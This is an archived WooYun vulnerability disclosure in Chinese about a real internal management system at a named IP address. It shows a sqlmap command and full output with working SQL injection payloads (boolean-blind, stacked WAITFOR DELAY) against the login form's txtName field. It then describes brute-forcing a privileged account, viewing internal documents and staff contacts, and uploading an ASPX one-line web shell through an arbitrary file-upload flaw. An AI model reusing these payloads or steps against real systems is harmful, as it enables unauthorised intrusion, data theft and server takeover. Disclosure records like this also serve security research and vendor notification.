乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-12: 细节已通知厂商并且等待厂商处理中 2015-04-17: 厂商已经主动忽略漏洞,细节向公众公开
fen
http://123.234.41.55/用户名存在注入漏洞 但密码随意输入却无法进入系统 应该是分开检测的它自动读取随机用户名只要密码能和用户名对上就会自动登入 那爆破和猜解就可以了
先看注入 #1
[root@Hacker~]# Sqlmap -u "123.234.41.55" --data "txtName=aaaa" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not resposible for any misuse or damage caused by this program[*] starting at 12:58:34[12:58:34] [INFO] parsing HTTP request from '1.txt'[12:58:35] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requsts:---Place: POSTParameter: txtName Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTAEGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnTpTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7MriIgbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x7EL7NWPQYxGA==&txtName=aaaa%' AND 5875=5875 AND '%'='&txtPwd=aaaaaa&txtCode=krp&bthLogin.x=64&bthLogin.y=10 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTAEGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnTpTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7MriIgbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x7EL7NWPQYxGA==&txtName=aaaa%'; WAITFOR DELAY '0:0:5';--&txtPwd=aaaaaa&txtCode=kpi&bthLogin.x=64&bthLogin.y=10 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTAEGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnTpTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7MriIgbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x7EL7NWPQYxGA==&txtName=aaaa%' WAITFOR DELAY '0:0:5'--&txtPwd=aaaaaa&txtCode=krp&bthLogin.x=64&bthLogin.y=10---[12:58:35] [INFO] testing MySQL[12:58:35] [WARNING] the back-end DBMS is not MySQL[12:58:35] [INFO] testing Oracle[12:58:35] [WARNING] the back-end DBMS is not Oracle[12:58:35] [INFO] testing PostgreSQL[12:58:35] [WARNING] the back-end DBMS is not PostgreSQL[12:58:35] [INFO] testing Microsoft SQL Server[12:58:36] [INFO] confirming Microsoft SQL Server[12:58:37] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2000[12:58:37] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 2 times[12:58:37] [WARNING] cannot properly display Unicode characters inside WindowsS command prompt (http://bugs.python.org/issue1602). All unhandled occurances wll result in replacement with '?' character. Please, find proper character reprsentation inside corresponding output files.[12:58:37] [INFO] fetched data logged to text files under 'F:\1937CN~1\VStart50tools\????\SQLMAP~2\Bin\output\123.234.41.55'[*] shutting down at 12:58:37[root@Hacker~]# Sqlmap
存在注入#2 爆破密码
登入系统后看看 权限这是一个后来爆破的高权限账号同意请假 哈
各种内部会议 技术 核心 资料
内部人员联系方式
#3 getshell我的工作计划 创建后可回复 任意文件上传 asp 杀 aspx 反而不杀
一句话
威胁内网 2008服务器就不搞了 - -
后台sql注入 以及用户 所使用的弱口令
危害等级:无影响厂商忽略
忽略时间:2015-04-17 21:44
漏洞Rank:15 (WooYun评价)
暂无